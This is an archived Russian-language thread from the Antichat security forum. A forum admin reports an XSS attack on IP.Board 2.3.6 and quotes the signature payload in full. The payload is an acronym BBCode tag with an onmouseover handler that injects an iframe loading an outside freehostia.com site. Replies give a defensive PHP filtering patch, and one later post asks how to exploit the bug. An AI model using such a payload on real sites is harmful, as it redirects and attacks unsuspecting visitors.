ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Пытаются ломануть через тег ipb |
07.03.2010, 14:41
|
|
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843
Репутация:
0
|
|
Пытаются ломануть через тег ipb
Есть форум ipb 2 3 6
один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код
Код HTML:
[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]
вот как работает тег акронима:
Код:
[acronym='Laugh Out Loud']lol[/acronym]
<acronym title='{option}'>{content}</acronym>
Как защититься и что делать?
Последний раз редактировалось goha; 30.03.2010 в 19:06..
|
|
|
07.03.2010, 15:19
|
|
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843
Репутация:
0
|
|
|
|
|
|
07.03.2010, 17:30
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме:
3718311
Репутация:
1118
|
|
добавь фильтрацию параметров - передаваемых в acronym
|
|
|
|
07.03.2010, 23:04
|
|
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843
Репутация:
0
|
|
|
|
|
|
08.03.2010, 19:56
|
|
Новичок
Регистрация: 16.11.2009
Сообщений: 6
Провел на форуме:
30843
Репутация:
0
|
|
Официальный фикс xss с акронимом в 2.3.6
Изменения
sources/classes/bbcode/class_bbcode_core.php
найти
Код:
# XSS Check: Bug ID: 980
if ( $row['bbcode_tag'] == 'post' OR $row['bbcode_tag'] == 'topic' OR $row['bbcode_tag'] == 'snapback' )
{
$match[ $_option ][$i] = intval( $match[ $_option ][$i] );
}
Добавить ниже
Код:
# XSS acronym
if ( $row['bbcode_tag'] == 'acronym' )
{
$match[ $_option ][$i] = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_option ][$i] );
$match[ $_option ][$i] = str_replace( array( ':', ';' ), '', $match[ $_option ][$i] );
$match[ $_content ][$i] = preg_replace( "/s((\\\|\)*)t((\\\|\)*)y((\\\|\)*)l((\\\|\)*)e((\\\|\)*)=/is", "st yle=", $match[ $_content ][$i] );
$match[ $_content ][$i] = str_replace( array( ':', ';' ), '', $match[ $_content ][$i] );
}
И это все. |
|
|
|
09.04.2010, 21:22
|
|
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме:
125847
Репутация:
5
|
|
кто разобрался как ява скрипт через эту XSS произвести?
|
|
|
|
09.04.2010, 23:05
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от Totgeliebt
кто разобрался как ява скрипт через эту XSS произвести?
http://forum.antichat.ru/showthread.php?p=997624
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
